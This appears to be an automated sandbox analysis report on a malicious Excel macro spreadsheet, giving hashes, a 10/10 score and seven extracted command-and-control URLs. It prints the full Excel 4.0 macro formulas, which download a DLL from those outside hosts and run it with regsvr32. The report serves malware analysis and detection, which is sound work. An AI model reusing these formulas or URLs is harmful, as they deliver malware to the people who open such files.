Overview

overview

10

Static

static

10

0270f2a384...d.xlsm

windows7-x64

10

0270f2a384...d.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    0270f2a384230188471311e45e44b2230ff8cc2ef853b0b9e3e70883c2a5cf8d

  • Size

    49KB

  • Sample

    241120-jj1chatme1

  • MD5

    a1d0dcb5271fa148d65f8170c6bf22a3

  • SHA1

    d52dcc7fc6afccfaba1d83b27911c655d45436ec

  • SHA256

    0270f2a384230188471311e45e44b2230ff8cc2ef853b0b9e3e70883c2a5cf8d

  • SHA512

    7b04fa715b1499a5c3e890a9f8f61a94326f84ac1f4cb7b5e78d012b65b86eeaebac177773038d188e5d9f630b3052beba24521e1c2b3ccc2b87f3edba59414e

  • SSDEEP

    1536:kAcEOt24xZdRBzH9hJBrdEwwNXekVIe260:NcEc2Kd3zdtdEwoB2t

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://alinatourbg.com/mail/TBCGVNzLeENXb/

http://alinac.ca/images/Lp6yKpIpRf6/

http://www.alsancaklimanemlak.com/system/T8nE1jfQ7W/

http://amakpost.com/assets/c8AT1uoCVLSxez/

http://alsanjari.co.uk/alsanjari.com/CynW/

http://alicehui.com/pics/fETgjDyPfUBQp/

http://amasides.my.id/cgi-bin/uFqdwCqAP7mro/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alinatourbg.com/mail/TBCGVNzLeENXb/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alinac.ca/images/Lp6yKpIpRf6/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.alsancaklimanemlak.com/system/T8nE1jfQ7W/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amakpost.com/assets/c8AT1uoCVLSxez/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alsanjari.co.uk/alsanjari.com/CynW/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alicehui.com/pics/fETgjDyPfUBQp/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amasides.my.id/cgi-bin/uFqdwCqAP7mro/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://alinatourbg.com/mail/TBCGVNzLeENXb/
xlm40.dropper

http://alinac.ca/images/Lp6yKpIpRf6/
xlm40.dropper

http://www.alsancaklimanemlak.com/system/T8nE1jfQ7W/
xlm40.dropper

http://amakpost.com/assets/c8AT1uoCVLSxez/
xlm40.dropper

http://alsanjari.co.uk/alsanjari.com/CynW/
xlm40.dropper

http://alicehui.com/pics/fETgjDyPfUBQp/
xlm40.dropper

http://amasides.my.id/cgi-bin/uFqdwCqAP7mro/

Targets

    • Target

      0270f2a384230188471311e45e44b2230ff8cc2ef853b0b9e3e70883c2a5cf8d

    • Size

      49KB

    • MD5

      a1d0dcb5271fa148d65f8170c6bf22a3

    • SHA1

      d52dcc7fc6afccfaba1d83b27911c655d45436ec

    • SHA256

      0270f2a384230188471311e45e44b2230ff8cc2ef853b0b9e3e70883c2a5cf8d

    • SHA512

      7b04fa715b1499a5c3e890a9f8f61a94326f84ac1f4cb7b5e78d012b65b86eeaebac177773038d188e5d9f630b3052beba24521e1c2b3ccc2b87f3edba59414e

    • SSDEEP

      1536:kAcEOt24xZdRBzH9hJBrdEwwNXekVIe260:NcEc2Kd3zdtdEwoB2t

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks